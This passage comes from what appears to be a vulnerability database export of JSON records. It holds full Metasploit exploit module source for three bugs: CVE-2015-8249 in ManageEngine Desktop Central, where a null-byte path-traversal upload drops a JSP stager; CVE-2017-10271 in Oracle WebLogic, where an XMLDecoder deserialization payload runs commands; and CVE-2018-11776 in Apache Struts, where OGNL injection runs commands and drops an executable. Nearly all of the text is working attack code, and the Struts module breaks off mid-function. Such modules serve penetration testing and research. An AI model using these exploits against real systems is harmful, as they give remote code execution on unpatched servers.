7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null bye at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. Please note that by default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file rdslog0.txt. This exploit was successfully tested on version 9, build 90109 and build 91084.\n", "cvss3": {}, "published": "2015-12-14T16:51:59", "type": "metasploit", "title": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-8249"], "modified": "2022-02-16T23:22:40", "id": "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_CONNECTIONID_WRITE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_connectionid_write/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'nokogiri'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n inject a null bye at the end of the value to create a malicious file with an arbitrary\n file type, and then place it under a directory that allows server-side scripts to run,\n which results in remote code execution under the context of SYSTEM.\n\n Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n but older ones run on port 8040. Also, using this exploit will leave debugging information\n produced by FileUploadServlet in file rdslog0.txt.\n\n This exploit was successfully tested on version 9, build 90109 and build 91084.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'sinn3r' ],\n 'References' =>\n [\n [ 'URL', 'https://www.rapid7.com/blog/post/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ],\n [ 'CVE', '2015-8249']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'ManageEngine Desktop Central 9 on Windows', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-12-14',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']),\n Opt::RPORT(8020)\n ])\n end\n\n def jsp_drop_bin(bin_data, output_file)\n jspraw = %Q|<%@ page import=\"java.io.*\" %>\\n|\n jspraw << %Q|<%\\n|\n jspraw << %Q|String data = \"#{Rex::Text.to_hex(bin_data, \"\")}\";\\n|\n\n jspraw << %Q|FileOutputStream outputstream = new FileOutputStream(\"#{output_file}\");\\n|\n\n jspraw << %Q|int numbytes = data.length();\\n|\n\n jspraw << %Q|byte[] bytes = new byte[numbytes/2];\\n|\n jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\\n|\n jspraw << %Q|{\\n|\n jspraw << %Q| char char1 = (char) data.charAt(counter);\\n|\n jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\\n|\n jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\\n|\n jspraw << %Q| comb <<= 4;\\n|\n jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\\n|\n jspraw << %Q| bytes[counter/2] = (byte)comb;\\n|\n jspraw << %Q|}\\n|\n\n jspraw << %Q|outputstream.write(bytes);\\n|\n jspraw << %Q|outputstream.close();\\n|\n jspraw << %Q|%>\\n|\n\n jspraw\n end\n\n def jsp_execute_command(command)\n jspraw = %Q|<%@ page import=\"java.io.*\" %>\\n|\n jspraw << %Q|<%\\n|\n jspraw << %Q|try {\\n|\n jspraw << %Q| Runtime.getRuntime().exec(\"chmod +x #{command}\");\\n|\n jspraw << %Q|} catch (IOException ioe) { }\\n|\n jspraw << %Q|Runtime.getRuntime().exec(\"#{command}\");\\n|\n jspraw << %Q|%>\\n|\n\n jspraw\n end\n\n def get_jsp_stager\n exe = generate_payload_exe(code: payload.encoded)\n jsp_fname = \"#{Rex::Text.rand_text_alpha(5)}.jsp\"\n # pwd: C:\\ManageEngine\\DesktopCentral_Server\\bin\n # targeted location: C:\\ManageEngine\\DesktopCentral_Server\\webapps\\DesktopCentral\\jspf\n register_files_for_cleanup(\"../webapps/DesktopCentral/jspf/#{jsp_fname}\")\n\n {\n jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname),\n jsp_name: jsp_fname\n }\n end\n\n def get_build_number(res)\n inputs = res.get_hidden_inputs\n # The buildNum input is in the first form\n inputs.first['buildNum']\n end\n\n def get_html_title(res)\n html = res.body\n n = ::Nokogiri::HTML(html)\n n.at_xpath('//title').text\n end\n\n def check\n uri = normalize_uri(target_uri.path, '/configurations.do')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n unless res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n build_number = get_build_number(res)\n vprint_status(\"Found build number: #{build_number}\")\n\n html_title = get_html_title(res)\n vprint_status(\"Found title: #{html_title}\")\n\n if build_number <= '91084'\n return Exploit::CheckCode::Appears\n elsif /ManageEngine Desktop Central/ === html_title\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def upload_jsp(stager_info)\n # connectionId is part of the 7z filename\n # computerName is part of the 7z filename (but will be used due to the null byte injection)\n # customerId is used as a directory name\n #\n # The intended upload path is:\n # C:\\ManageEngine\\DesktopCentral_Server\\webapps\\DesktopCentral\\server-data\\[customerId]\\rds\\scr-rec\\null-computerName-connectionId.7z\n # But this will upload to:\n # C:\\ManageEngine\\DesktopCentral_Server\\webapps\\DesktopCentral\\jspf\n\n uri = normalize_uri(target_uri.path, 'fileupload')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'ctype' => 'application/octet-stream',\n 'encode_params' => false,\n 'data' => stager_info[:jsp_payload],\n 'vars_get' => {\n 'connectionId' => \"#{Rex::Text.rand_text_alpha(1)}/../../../../../jspf/#{stager_info[:jsp_name]}%00\",\n 'resourceId' => Rex::Text.rand_text_alpha(1),\n 'action' => 'rds_file_upload',\n 'computerName' => Rex::Text.rand_text_alpha(rand(10)+5),\n 'customerId' => Rex::Text.rand_text_numeric(rand(10)+5)\n }\n })\n\n if res.nil?\n fail_with(Failure::Unknown, \"Connection timed out while uploading to #{uri}\")\n elsif res && res.code != 200\n fail_with(Failure::Unknown, \"The server returned #{res.code}, but 200 was expected.\")\n end\n end\n\n def exec_jsp(stager_info)\n uri = normalize_uri(target_uri.path, \"/jspf/#{stager_info[:jsp_name]}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil?\n fail_with(Failure::Unknown, \"Connection timed out while executing #{uri}\")\n elsif res && res.code != 200\n fail_with(Failure::Unknown, \"Failed to execute #{uri}. Server returned #{res.code}\")\n end\n end\n\n def exploit\n print_status(\"Creating JSP stager\")\n stager_info = get_jsp_stager\n\n print_status(\"Uploading JSP stager #{stager_info[:jsp_name]}...\")\n upload_jsp(stager_info)\n\n print_status(\"Executing stager...\")\n exec_jsp(stager_info)\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_connectionid_write.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-23T12:17:00", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-24T16:57:20", "description": "This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.\n", "cvss3": {}, "published": "2018-08-31T18:48:22", "type": "metasploit", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-01-27T15:58:53", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_namespace_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\n #include Msf::Exploit::CmdStager # https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html\n\n # NOTE: Debugging code has been stripped, but is available in the commit history: a9e625789175a4c4fdfc7092eedfaf376e4d648e\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\n via an endpoint that makes use of a redirect action.\n\n Note that this exploit is dependant on the version of Tomcat running on\n the target. Versions of Tomcat starting with 7.0.88 currently don't\n support payloads larger than ~7.5kb. Windows Meterpreter sessions on\n Tomcat >=7.0.88 are currently not supported.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.\n },\n 'Author' => [\n 'Man Yue Mo', # Discovery\n 'hook-s3c', # PoC\n 'asoto-r7', # Metasploit module\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-11776'],\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Automatic detection', {\n 'Platform' => %w{ unix windows linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Windows', {\n 'Platform' => %w{ windows },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Linux', {\n 'Platform' => %w{ unix linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\n },\n ],\n ],\n 'DisclosureDate' => '2018-08-22', # Private disclosure = 2018-04-10\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\n OptBool.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\n ]\n )\n register_advanced_options(\n [\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\n ]\n )\n end\n\n def check\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\n\n resp = send_struts_request(ognl)\n\n # If vulnerable, the server should return an HTTP 302 (Redirect)\n # and the 'Location' header should contain either 'true' or 'false'\n if resp && resp.headers['Location']\n output = resp.headers['Location']\n vprint_status(\"Redirected to: #{output}\")\n if (output.include? '/true/')\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n elsif (output.include? '/false/')\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\n datastore['ENABLE_STATIC'] = true\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp && resp.code==400\n # METHOD 2: Generate two random numbers, ask the target to add them together.\n # If it does, it's vulnerable.\n a = rand(10000)\n b = rand(10000)\n c = a+b\n\n ognl = \"#{a}+#{b}\"\n\n resp = send_struts_request(ognl)\n\n if resp.headers['Location'].include? c.to_s\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp.nil?\n fail_with(Failure::Unreachable,\"Target did not respond. Please double check RHOSTS and RPORT\")\n end\n end\n\n def exploit\n case payload.arch.first\n when ARCH_CMD\n resp = execute_command(payload.encoded)\n else\n resp = send_payload()\n end\n end\n\n def encode_ognl(ognl)\n # Check and fail if the command contains the follow bad characters:\n # ';' seems to terminates the OGNL statement\n # '/' causes the target to return an HTTP/400 error\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\n # '\\r' ends the GET request prematurely\n # '\\n' ends the GET request prematurely\n\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\n bad_chars.each do |c|\n if ognl.include? c\n print_error(\"Bad OGNL request: #{ognl}\")\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\n end\n end\n\n # The following list of characters *must* be encoded or ORNL will asplode\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\n \" \": \"%20\",\n \"\\\"\":\"%22\",\n \"#\": \"%23\",\n \"'\": \"%27\",\n \"<\": \"%3c\",\n \">\": \"%3e\",\n \"?\": \"%3f\",\n \"^\": \"%5e\",\n \"`\": \"%60\",\n \"{\": \"%7b\",\n \"|\": \"%7c\",\n \"}\": \"%7d\",\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n }\n\n encodable_chars.each do |k,v|\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\n ognl.gsub!(\"#{k}\",\"#{v}\")\n end\n return ognl\n end\n\n def send_struts_request(ognl, payload: nil, headers: nil)\n ognl = \"${#{ognl}}\"\n vprint_status(\"Submitted OGNL: #{ognl}\")\n ognl = encode_ognl(ognl)\n\n if headers.nil?\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\n end\n\n if payload\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\n headers[datastore['HEADER']] = payload\n end\n\n # TODO: Consider embedding OGNL in an HTTP header to hide it from the Tomcat logs\n uri = normalize_uri(target_uri.path, \"/#{ognl}/#{datastore['ACTION']}\")\n\n r = send_request_cgi(\n #'encode' => true, # this fails to encode '\\', which is a problem for me\n 'uri' => uri,\n 'method' => datastore['HTTPMethod'],\n 'headers' => headers\n )\n\n if r && r.code == 404\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\n end\n\n return r\n end\n\n def send_profile\n # Use OGNL to extract properties from the Java environment\n\n properties = { 'os.name': nil, # e.g. 'Linux'\n 'os.arch': nil, # e.g. 'amd64'\n 'os.version': nil, # e.g. '4.4.0-112-generic'\n 'user.name': nil, # e.g. 'root'\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\n 'user.language': nil, # e.g. 'en'\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\n }\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|('#{rand_text_alpha(2)}')|\n properties.each do |k,v|\n ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|\n end\n ognl = ognl[0...-4]\n\n r = send_struts_request(ognl)\n\n if r.code == 400\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\n elsif r.headers['Location']\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\n # Extract the OGNL output from the Location path, and strip the two random chars\n s = r.headers['Location'].split('/')[1][2..-1]\n\n if s.nil?\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\n # But we didn't get any output, so we can't profile the target. Abort.\n return nil\n end\n\n # Confirm that all fields were returned, and non include extra (:) delimiters\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\n if s.count(':') > properties.length\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\n end\n\n # Separate the colon-delimited properties and store in the 'properties' hash\n s = s.split(':')\n i = 0\n properties.each do |k,v|\n properties[k] = s[i]\n i += 1\n end\n\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\n return properties\n else\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\n end\n end\n\n def profile_os\n # Probe for the target OS and architecture\n begin\n properties = send_profile()\n os = properties[:'os.name'].downcase\n rescue\n vprint_warning(\"Target profiling was unable to determine operating system\")\n os = ''\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\n end\n return os\n end\n\n def execute_command(cmd_input, opts={})\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\n if cmd_input.include? ';'\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\n end\n\n os = profile_os()\n\n if os && ((os.include? 'linux') || (os.include? 'nix'))\n cmd = \"{'sh','-c','#{cmd_input}'}\"\n elsif os && (os.include? 'win')\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\n else\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\n cmd = cmd_input\n end\n\n # The following OGNL will run arbitrary commands on Windows and Linux\n # targets, as well as returning STDOUT and STDERR. In my testing,\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\n\n vprint_status(\"Executing: #{cmd}\")\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\n ognl << %q|(#p.redirectErrorStream(true)).|\n ognl << %q|(#process=#p.start()).|\n ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|\n ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|\n ognl << %q|(#r.flush())|\n\n r = send_struts_request(ognl)\n\n if r && r.code == 200\n print_good(\"Command executed:\\n#{r.body}\")\n elsif r\n if r.body.length == 0\n print_status(\"Payload sent, but no output provided from server.\")\n elsif r.body.length > 0\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\n end\n end\n end\n\n def send_payload\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\n end\n\n payload = generate_payload_exe\n print_status(\"Generated #{payload.length} byte binary payload\")\n payload_b64 = [payload].pack(\"m\").delete(\"\\n\")\n\n if payload_b64.length < 8100\n send_payload_oneshot(payload_b64)\n else\n send_payload_multishot(payload)\n end\n end\n\n def send_payload_oneshot(payload)\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\n end\n\n random_filename = datastore['TEMPFILE']\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','.tmp')).|\n ognl << %q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n #TODO: Consider GZIP: ognl << %q|(#s.write(java.util.zip.GZIPInputStream(#d).read())).|\n ognl << %q|(#s.close()).|\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n\n r = send_struts_request(ognl, payload: payload)\n\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\n print_good(\"Payload successfully dropped and executed.\")\n elsif r && r.headers['Location']\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n elsif r && r.code == 400\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\n end\n end\n\n def ognl_create_file()\n filename = datastore['TEMPFILE']\n\n # f = path to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@java.io.File@createTempFile('#{filename}','.exe')).|\n ognl << %q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#f)|\n\n r = send_struts_request(ognl)\n\n begin\n tempfile = r.headers['Location']\n tempfile = tempfile[1..-(2+datastore['ACTION'].length)]\n if tempfile.empty?\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file on target. Try a cmd/*/generic payload\")\n end\n rescue\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file. Try a cmd/*/generic payload\")\n end\n\n return tempfile\n end\n\n def send_payload_multishot(payload)\n tempfile = ognl_create_file()\n print_status(\"Temp file created: #{tempfile}\")\n\n payload_cursor = 0\n\n while payload_cursor < payload.length\n payload_size = rand(4500..5000) # payload_size cannot exceed 5645 in my testing\n payload_start = payload_cursor\n payload_end = payload_cursor + payload_size\n payload_end = payload.size if payload_end > payload.size\n\n chunk_bin = payload[payload_start..payload_end]\n chunk_b64 = [chunk_bin].pack(\"m\").delete(\"\\n\")\n print_status(\"Sending payload chunk: #{chunk_b64.length} bytes\")\n 